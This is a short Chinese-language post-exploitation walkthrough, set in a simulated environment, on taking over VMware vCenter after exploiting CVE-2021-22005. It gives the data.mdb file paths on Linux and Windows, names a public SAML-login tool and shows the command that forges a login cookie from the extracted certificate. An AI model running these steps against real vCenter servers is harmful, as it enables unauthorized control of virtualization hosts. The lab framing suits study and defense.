模拟环境：

使用CVE-2021-22005获取权限后下载data.mdb文件

vSphere：

vSphere是VMware推出的虚拟化平台套件，包含ESXi、vCenter等一系列的软件。

其中vCenter为 ESXi的控制中心，可从单一控制点统一管理数据中心的所有vSphere主机和虚拟机，使得运维能够提高控制能力，也使我们作为攻击者能够更快速的对权限进行获取。

vSphere5开始引入了单点登录系统，同时使用SAML作为授权服务支持。当用户登录服务时，该服务会将身份验证请求转发给 SAML 。SAML 验证用户凭据是否正确以及他们是否有权访问指定的服务。

位置：

Linux-data.mdb文件位置:

/storage/db/vmware-vmdir/data.mdb

Windows-data.mdb文件位置:

C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb

使用更快捷的脚本从data.mdb 文件的目录服务信息中提取LDP 证书并登录 vCenter

此处应注意将Python能否与目标vCenter通信

https://github.com/horizon3ai/vcenter_saml_login

python3 vcenter_saml_login.py -p data.mdb -t 192.168.0.92

获取到Cookie后后添加并访问 https://192.168.xx.xx/ui

后渗透-利用SAML证书登录vCenter